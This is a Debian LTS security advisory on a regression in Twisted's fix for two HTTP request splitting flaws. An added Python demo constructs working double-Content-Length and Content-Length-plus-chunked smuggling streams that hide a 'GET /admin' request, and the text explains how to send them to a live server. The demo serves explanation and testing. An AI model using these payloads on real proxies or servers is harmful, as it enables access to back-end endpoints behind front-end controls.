Debian Security Advisory
DLA-2145-2 twisted -- LTS regression update
- Date Reported:
- 19 Mar 2020
- Affected Packages:
- twisted
- Security database references:
- In Mitre's CVE dictionary: CVE-2020-10108, CVE-2020-10109.
- More information:
It was discovered that there was a regression introduced in DLA-2145-1 due to the incorrect application of the upstream patch for CVE-2020-10108 and CVE-2020-10109, which address a number of HTTP request splitting vulnerabilities in Twisted, a Python event-based framework for building various types of internet applications.
Thanks to Etienne Allovon for the detailed report.
CVE-2020-10108
In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with two Content-Length headers, it ignored the first header. When the second Content-Length value was set to zero, the request body was interpreted as a pipelined request, so bytes that a front end treated as the body of one request became a second request on the back end.
CVE-2020-10109
In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with both a Content-Length and a chunked Transfer-Encoding header, the Content-Length took precedence and the remainder of the request body was interpreted as a pipelined request.
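To make the two framing bugs concrete, the following is an added example, not code from Twisted or from the advisory: a minimal HTTP/1.1 request framer with three header-precedence policies, run over two hand-constructed byte streams. The "vulnerable" policy reproduces the pre-fix behaviour the advisory describes (Content-Length beats Transfer-Encoding, and the last of several Content-Length headers wins); "lenient" is what a peer that lets Transfer-Encoding override Content-Length and takes the first Content-Length would see; "strict" rejects either ambiguity with a 400, which RFC 7230 section 3.3.3 permits and which is the behaviour a patched server should have. The policy names, the `BadRequest` class and the sample requests are all assumptions made for this illustration.

```python
"""Constructed demo of the two request-splitting patterns in the advisory.

Not Twisted's parser: a tiny HTTP/1.1 framer with three policies,
run over hand-built byte streams to show where one request becomes two.
"""


class BadRequest(Exception):
    """Raised where a hardened server would answer 400 Bad Request."""


def split_head(buf: bytes):
    """Return (request_line, [(name, value)], rest) for the next request."""
    head, sep, rest = buf.partition(b"\r\n\r\n")
    if not sep:
        raise BadRequest("incomplete request head")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, rest


def read_chunked(data: bytes):
    """Decode a chunked body; return (body, bytes left after the terminator)."""
    body = b""
    while True:
        size_line, _, data = data.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            while True:  # skip the trailer section up to the empty line
                trailer, _, data = data.partition(b"\r\n")
                if not trailer:
                    return body, data
        body += data[:size]
        data = data[size + 2:]  # drop chunk data and its trailing CRLF


def frame_requests(raw: bytes, policy: str):
    """Frame every request in raw; return [(request_line, body), ...]."""
    out, buf = [], raw
    while buf:
        request_line, headers, rest = split_head(buf)
        cls = [v for n, v in headers if n == b"content-length"]
        chunked = any(n == b"transfer-encoding" and b"chunked" in v.lower()
                      for n, v in headers)
        if policy == "strict":
            if chunked and cls:
                raise BadRequest("Content-Length with Transfer-Encoding")
            if len(set(cls)) > 1:
                raise BadRequest("conflicting Content-Length values")
        if policy == "vulnerable":
            use_cl = bool(cls)                  # CL beats TE, last CL wins
            length = int(cls[-1]) if cls else 0
        else:
            use_cl = bool(cls) and not chunked  # TE overrides CL, first CL
            length = int(cls[0]) if cls else 0
        if use_cl:
            body, buf = rest[:length], rest[length:]
        elif chunked:
            body, buf = read_chunked(rest)
        else:
            body, buf = b"", rest
        out.append((request_line, body))
    return out


# --- constructed inputs (assumed, not from the advisory) ------------------
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: example\r\n\r\n"

# CVE-2020-10108 pattern: two Content-Length headers, the second zero.
DOUBLE_CL = (b"POST /a HTTP/1.1\r\nHost: example\r\n"
             + b"Content-Length: %d\r\n" % len(SMUGGLED)
             + b"Content-Length: 0\r\n\r\n" + SMUGGLED)

# CVE-2020-10109 pattern: Content-Length plus Transfer-Encoding: chunked.
# Content-Length covers only the chunk-size line; the chunk itself holds a
# request whose own Content-Length (7) swallows the "\r\n0\r\n\r\n" left
# after it, so the vulnerable framing yields exactly two clean requests.
INNER = b"GET /admin HTTP/1.1\r\nHost: example\r\nContent-Length: 7\r\n\r\n"
SIZE_LINE = b"%x\r\n" % len(INNER)
CL_TE = (b"POST /b HTTP/1.1\r\nHost: example\r\n"
         + b"Content-Length: %d\r\n" % len(SIZE_LINE)
         + b"Transfer-Encoding: chunked\r\n\r\n"
         + SIZE_LINE + INNER + b"\r\n0\r\n\r\n")


def request_lines(raw: bytes, policy: str):
    """Request lines a server applying the given policy would act on."""
    return [line for line, _ in frame_requests(raw, policy)]


if __name__ == "__main__":
    for name, raw in (("double CL", DOUBLE_CL), ("CL+TE", CL_TE)):
        for policy in ("vulnerable", "lenient", "strict"):
            try:
                print(name, policy, request_lines(raw, policy))
            except BadRequest as exc:
                print(name, policy, "400:", exc)
```

Running it shows the disagreement that makes these bugs exploitable behind a proxy: for both inputs the "vulnerable" policy acts on a second `GET /admin` request that the "lenient" policy never sees (it frames the same bytes as one request with a longer body), while "strict" refuses both streams. Checking a deployed server is the same exercise: send the two streams over one connection and see whether two responses come back.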
For Debian 8 "Jessie", these problems have been fixed in version 14.0.2-3+deb8u2.
We recommend that you upgrade your twisted packages.
Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS